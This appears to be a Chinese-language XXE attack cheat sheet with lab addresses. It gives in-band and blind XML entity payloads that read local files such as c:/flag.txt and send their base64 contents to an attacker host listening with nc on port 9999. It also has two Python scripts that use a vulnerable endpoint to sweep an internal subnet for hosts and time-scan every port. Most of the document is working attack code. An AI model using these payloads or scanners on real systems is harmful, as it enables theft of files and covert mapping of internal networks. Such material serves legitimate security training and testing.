
xxe

XXE

有回显读取本地敏感文件（in-band XXE：文件内容直接出现在 HTTP 响应里。前提是目标解析器会展开参数实体，并且能向攻击者主机请求外部 DTD）

  1. payload.dtd（这是发送给目标的 XML 文档本身，并非 DTD；%start/%end 把文件内容包进 CDATA，避免文件里的 <、& 等字符破坏 XML 格式）
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE roottag [
<!ENTITY % start "<![CDATA[">
<!ENTITY % goodies SYSTEM "file:///c:/flag.txt">
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://192.168.10.30/evil.dtd"> <!-- 192.168.10.30 换成攻击者(本地)IP。注意 '#' 不是 XML 注释语法，发送时不能带上 -->
%dtd; ]>

<roottag>&all;</roottag>
  1. evil.dtd
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY all "%start;%goodies;%end;">

无回显读取本地敏感文件（out-of-band / blind XXE：响应里看不到文件内容，而是让目标解析器把 base64 编码后的内容作为 URL 参数发到攻击者监听的端口；要求目标能向外发起 HTTP 请求）

  1. payload.dtd（发送给目标的 XML 文档；%remote; 先加载 evil.dtd，%int; 声明出 %send;，%send; 触发外带请求，顺序不能变）
<!DOCTYPE convert [
<!ENTITY % remote SYSTEM "http://192.168.10.30/evil.dtd"> <!-- 192.168.10.30 换成攻击者(本地)IP。'#' 不是 XML 注释语法，发送时不能带上 -->
%remote;%int;%send;
]>
  1. evil.dtd（php://filter 要求目标用 PHP 解析 XML；base64 使文件中的换行和特殊字符可以放进 URL 参数，&#37; 是被转义的 %，用来在实体值内部再声明一个参数实体）
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///c:/flag.txt">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://192.168.10.30:9999?p=%file;'>"> <!-- 192.168.10.30:9999 为攻击者监听地址；'#' 不是 XML 注释语法，文件中不要保留 -->
  1. 在攻击者主机上用 nc 监听 9999 端口（如 nc -lvnp 9999）；文件内容会出现在收到的请求的 p 参数中，base64 解码即可。文件较大时可能超出 URL 长度限制，收到的数据会被截断

内网主机探测（让目标解析器去请求 http://<ip>/ ；下面脚本的判断依据很弱——只要请求没超时、响应能拆出两个以上字段就算"发现"，结果需要人工核对原始响应）

import requests
import base64

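def XXE(ip, string, headers=None, target='http://192.168.38.132/xxe_test.php', timeout=5):
    """Probe one internal host through an XXE-vulnerable endpoint.

    Builds an XML document whose external entity ``xxe`` resolves to
    ``string`` (a ``php://filter`` URL wrapping ``http://<ip>/``), posts it
    to ``target`` and reports whether the endpoint answered in a way the
    original heuristic treats as "host found".

    Args:
        ip: Host being probed; only used in the printed result.
        string: SYSTEM identifier placed verbatim in the entity declaration.
            A ``"`` inside it would terminate the literal early.
        headers: Request headers; defaults to ``Content-Type: application/xml``
            (previously read from a module-level global of the same name).
        target: URL of the XXE-vulnerable endpoint (the lab target).
        timeout: Seconds to wait for the target before giving up.

    Returns:
        True when the request completed and the reply had at least two
        space-separated fields (the original ``split(' ')[-2]`` check),
        False on timeout, connection error or a too-short reply.
    """
    if headers is None:
        headers = {'Content-Type': 'application/xml'}
    xml = "\r\n".join([
        '<?xml version="1.0" encoding="ISO-8859-1"?>',
        '<!DOCTYPE foo [ <!ELEMENT foo ANY >',
        '<!ENTITY xxe SYSTEM "' + string + '">]>',
        '<xml>',
        ' <stuff>&xxe;</stuff>',
        '</xml>',
    ])
    try:
        reply = requests.post(target, data=xml, headers=headers, timeout=timeout).text
    except requests.RequestException:
        # Timeout / connection error: the target never answered, or it hung
        # while trying to fetch http://<ip>/ on our behalf.
        print(' [-]', ip, 'Error')
        return False
    # Same heuristic as before: a reply with fewer than two fields used to
    # raise IndexError and was reported as an error. This is a weak liveness
    # guess, not proof the host exists; inspect the raw reply when in doubt.
    if len(reply.split(' ')) < 2:
        print(' [-]', ip, 'Error')
        return False
    print(' [+]', ip, 'Successfully Found !!!')
    return True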

if __name__ == '__main__':
    # Content type the lab endpoint expects; XXE() also reads this global.
    headers = {'Content-Type': 'application/xml'}
    # First three octets of the /24 to sweep; adjust for the lab network.
    prefix = '192.168.38.'
    for host_id in range(1, 255):
        ip = prefix + str(host_id)
        # php://filter base64-encodes whatever http://<ip>/ returns so the
        # bytes survive being inlined into the target's XML reply.
        string = 'php://filter/convert.base64-encode/resource=http://' + ip + '/'
        XXE(ip, string)

内网主机端口扫描（基于响应耗时：目标解析器会去 host:port 取外部 DTD，被过滤/无响应的端口通常会让请求明显变慢甚至超时；仅凭耗时一般分不清开放和关闭，应结合响应内容判断）

import requests
import base64

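def XXE(port, host='192.168.38.129', target='http://192.168.38.132/xxe_test.php', timeout=5):
    """Time one port of an internal host through the XXE endpoint.

    The document's DOCTYPE points its external DTD at ``http://host:port/``,
    so the target's XML parser tries to connect there while handling our
    request; the round-trip time of our request is the only signal.

    Args:
        port: TCP port to probe (int or str; embedded in the DTD URL).
        host: Internal host the target parser is made to connect to.
        target: URL of the XXE-vulnerable endpoint (the lab target).
        timeout: Seconds to wait for the target before reporting a timeout.

    Returns:
        The elapsed time in seconds as reported by ``requests``, or None when
        the request timed out or failed. Previously a timeout raised and
        aborted the whole scan at the first filtered port.
    """
    xml = "\r\n".join([
        '<?xml version="1.0" encoding="utf-8"?> ',
        '<!DOCTYPE data SYSTEM "http://' + host + ':' + str(port) + '/" [',
        '<!ELEMENT data (#PCDATA)> ',
        ']>',
        '<data>7</data>',
    ])
    try:
        reply = requests.post(target, data=xml, timeout=timeout)
    except requests.RequestException as exc:
        # A timeout here usually means the target itself hung while reaching
        # host:port (filtered / silently dropped); report and keep scanning.
        print(port, 'timeout/error:', type(exc).__name__)
        return None
    elapsed = reply.elapsed.total_seconds()
    print(port, elapsed)
    return elapsed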

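if __name__ == '__main__':
    # range() excludes its upper bound: 65536 so that port 65535 is scanned
    # too (the original range(1, 65535) silently skipped it).
    for port in range(1, 65536):
        XXE(port)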